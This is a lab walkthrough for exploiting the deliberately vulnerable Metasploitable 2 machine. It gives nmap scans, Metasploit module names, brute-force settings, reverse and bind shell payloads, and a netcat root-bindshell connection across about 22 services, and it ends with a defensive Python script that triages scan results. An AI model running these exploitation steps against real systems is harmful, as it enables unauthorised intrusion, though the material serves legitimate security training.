To exploit the vulnerabilities present in Metasploitable 2.

Metasploit .vul :- 1

FTP vsftpd 2.3.4

Backdoor command vulnerability

Steps:

Scan the network using nmap: nmap -v -A -T4 192.168.5.235

Now open your Metasploit framework and search vsftpd.

Now use exploit/unix/ftp/vsftpd_234_backdoor and exploit it.

Now search shell_to_meterpreter. Use post/multi/manage/shell_to_meterpreter.

Now interact with both sessions.

Now run the basic commands.

Metasploit .vul :- 2

TCP-22 SSH

OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

Steps:-

Scan the network using nmap: nmap -sV 192.168.5.237

Open Metasploit and search for the auxiliary module for SSH login. The command will be "search ssh_login".

Use the appropriate auxiliary module by typing the command "use 0" and set the IP of the victim machine as the RHOSTS global variable by typing the command "set rhosts 192.168.5.237".

For setting the options, type "options" to find out the required fields and set the path of the username and password file in the USERPASS_FILE option. Also set STOP_ON_SUCCESS and VERBOSE to true. Set THREADS to 10.

After running the module, MSF will brute force the login and will stop the attack after finding a valid combination.

Now start the session with "sessions -i 1"; a shell is now open, so use shell commands.

Metasploit .vul :- 3

Port Number: TCP-23

Service: Telnet

Vulnerability name: Linux telnetd

Steps

Scan the network to find the vulnerabilities.

nmap -v -A -T4 192.168.5.235

Now type telnet 192.168.5.235

Now open Wireshark and check the packets.

Now right-click on the selected packet and follow the TCP stream.

Metasploit .vul :- 4

Port Number: TCP-1099

Service: java-rmi

Vulnerability name: GNU Classpath grmiregistry

Steps

Scan the network using nmap: nmap -sV 192.168.60.139

Now use the exploit multi/misc/java_rmi_server and check the options.

Now set RHOST.

Set the URI path to root and show options.

Show targets and use the relevant target; here mostly the generic one is used.

Set the default payload.

Now exploit it and use the session.

Metasploit .vul :- 5

Port 8180, Tomcat service

Steps

Scan and check the nmap result.

Find the Tomcat service port.

Type the command "search tomcat" and look for the login module.

Now check the options with the command "show options".

Now set RHOSTS and RPORT, and set STOP_ON_SUCCESS to true.

After we enter run, check for the successful login.

Now search for tomcat_mgr, which is the Tomcat manager module.

Now exploit Tomcat.

As we have exploited it and entered Meterpreter, we can run commands like sysinfo to get information about the system.

Now we have entered the shell with the command shell, so we can view the directories with ls.

Metasploit .vul :- 6

port 53/tcp open domain ISC BIND 9.4.2

Steps

Scan and check the nmap result.

Search bailiwicked_domain and use spoof/dns/bailiwicked_domain.

Go to Wireshark and select eth0.

Open the DNS packet.

Metasploit .vul :- 7

Port :- 6667, IRC server

Go to Metasploit and search unreal_ircd.

Use unix/irc/unreal_ircd_3281_backdoor

Use payload :- 0, 2

cmd/unix/bind_perl

cmd/unix/bind_ruby

Metasploit .vul :- 8

Port :- 139, netbios-ssn

Samba usermap script vulnerability

Go to Metasploit and search usermap_script

Use multi/samba/usermap_script

Use payload :- 18

cmd/unix/reverse

Metasploit .vul :- 9

Port :- 3632, distccd

Search distcc_exec and use unix/misc/distcc_exec

Use payload :- 5

cmd/unix/reverse

Metasploit .vul :- 10

PHP up to versions 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability.

Port :- 80

Steps

Go to the browser and check the PHP configuration file path.

Go to msf.

Search php_cgi_arg and use multi/http/php_cgi_arg_injection.

Metasploit .vul :- 11

Port :- 80

TWiki history TWikiUsers rev parameter command execution

Steps

Search twiki_history and use unix/webapp/twiki_history

Use payload "cmd/unix/bind_perl"

Metasploit .vul :- 12

Port :- 445

Samba is running on both ports 139 and 445; we will be exploiting it using Metasploit. The default port for this exploit is set to 139, but it can be changed to 445 as well.

Metasploit .vul :- 13

Port :- 5432

Go to msf, search postgres_payload and use linux/postgres/postgres_payload.

Set RHOSTS,

LHOST = <Linux IP>

Metasploit .vul :- 14

Port 6667 has the Unreal IRCd service running; we will exploit it using a backdoor module that's available in Metasploit.

Port :- 6667

Search unreal_ircd and use unix/irc/unreal_ircd_3281_backdoor.

Set payload :- 2, 5

cmd/unix/bind_perl

cmd/unix/reverse

Metasploit .vul :- 15

Port :- 6697

Search unreal_ircd and use unix/irc/unreal_ircd_3281_backdoor.

Set payload "cmd/unix/reverse"

Metasploit .vul :- 16

Port :- 5900

This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol versions 3.3, 3.7 and 3.8 using the VNC challenge-response authentication method.

Steps

Search vnc_login and use scanner/vnc/vnc_login.

Let's put what we've found to the test by connecting using vncviewer.
Command: "vncviewer <Metasploitable IP>"
password = password

Metasploit .vul :- 17

Port :- 1524

Metasploitable 2 comes with an open bindshell service running on port 1524. We will be using Netcat to connect to it.

Steps

Go to msf and enter the command "nc <Metasploitable IP> 1524"

Metasploit .vul :- 18

Port :- 2121, ProFTPD

telnet <Target IP Address> <Port Number>

USER <username>
PASS <password>

Metasploit .vul :- 19

Port :- 3306, MySQL

Set the command and enter.

No password, so directly press enter.

Metasploit .vul :- 20

Port :- 25, SMTP

Search smtp_enum and use scanner/smtp/smtp_enum.

Open a second terminal.

SMTP commands.

Metasploit .vul :- 21

Remote shell exploitation

Port :- 514

Install rsh-client

Enter the command "rsh <ip>"

Metasploit .vul :- 22

Port :- 513, rlogin
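As an added defender-side example (not part of the original write-up), the following Python script triages nmap -sV output for the Metasploitable 2 services and versions listed above: it parses the open-port lines, compares banner versions, and reports which services are end-of-life, cleartext, unauthenticated or known-backdoored builds. The sample scan rows and the rule table are constructed here from the versions named on this page and are not real captures.

```python
import re

# Constructed sample of "nmap -sV" output, modelled on the Metasploitable 2
# services and versions this write-up walks through (not a real capture).
SAMPLE_NMAP = """\
PORT     STATE SERVICE   VERSION
21/tcp   open  ftp       vsftpd 2.3.4
22/tcp   open  ssh       OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet    Linux telnetd
53/tcp   open  domain    ISC BIND 9.4.2
80/tcp   open  http      Apache httpd 2.2.8 ((Ubuntu) DAV/2)
513/tcp  open  login     OpenBSD or Solaris rlogind
514/tcp  open  shell     Netkit rshd
1099/tcp open  java-rmi  GNU Classpath grmiregistry
1524/tcp open  bindshell Metasploitable root shell
3632/tcp open  distccd   distccd v1
6667/tcp open  irc       UnrealIRCd
"""
LINE_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

def parse_nmap_services(text):
    """Return (port, proto, service, version) for every open-port line."""
    rows = []
    for m in filter(None, (LINE_RE.match(line.strip()) for line in text.splitlines())):
        rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4).strip()))
    return rows

def version_tuple(banner):
    """First dotted number in a banner: '4.7p1' -> (4, 7), '9.4.2' -> (9, 4, 2)."""
    m = re.search(r"\d+(?:\.\d+)*", banner)
    return tuple(int(x) for x in m.group(0).split(".")) if m else ()

# Ordered rules, first match wins: version-specific ones come first so vsftpd 2.3.4 is not reported as merely "FTP".
RULES = [
    (r"vsftpd", lambda v: version_tuple(v) == (2, 3, 4), "vsftpd 2.3.4 build with known backdoor: reinstall from a trusted package"),
    (r"OpenSSH", lambda v: version_tuple(v) < (5, 0), "end-of-life OpenSSH: upgrade, enforce key-based auth"),
    (r"ISC BIND", lambda v: version_tuple(v) < (9, 5), "end-of-life BIND 9.4.x: upgrade, restrict recursion"),
    (r"^(telnet|login|shell|ftp)$", None, "cleartext protocol, credentials readable on the wire: disable, use SSH/SFTP"),
    (r"^(distccd|java-rmi|bindshell)$", None, "unauthenticated remote-execution service: firewall or remove"),
    (r"UnrealIRCd", None, "UnrealIRCd: verify the build against vendor checksums (3.2.8.1 was backdoored)"),
]

def triage(rows):
    findings = []  # (port, service, finding) for every row that matches a rule
    for port, _proto, service, version in rows:
        for pattern, pred, finding in RULES:
            if (re.search(pattern, service) or re.search(pattern, version)) and (pred is None or pred(version)):
                findings.append((port, service, finding))
                break
    return findings
```

Running triage(parse_nmap_services(SAMPLE_NMAP)) flags every sample port except 80/tcp, which matches no rule.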



 
